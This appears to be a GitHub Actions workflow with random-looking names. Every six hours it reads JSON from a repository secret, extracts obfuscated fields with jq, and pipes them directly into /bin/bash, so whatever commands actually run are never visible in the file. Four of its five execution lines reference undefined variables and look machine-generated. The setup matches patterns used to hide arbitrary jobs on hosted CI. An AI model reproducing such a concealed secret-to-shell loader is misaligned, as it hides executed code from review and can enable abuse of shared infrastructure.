name: huchunyan3456

on:
  workflow_dispatch:
  schedule:
    - cron: '31 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huchunyan3456
        env:
          p62: ${{ secrets.p62 }}
        run: |
          echo $p62 | jq -r .etrc6380 | /bin/bash
          echo $vm4 | jq -r .dye48081 | /bin/bash
          echo $xdx7079 | jq -r .zj333 | /bin/bash
          echo $hkka162 | jq -r .d6542 | /bin/bash
          echo $zbgpw20285 | jq -r .yyi8 | /bin/bash

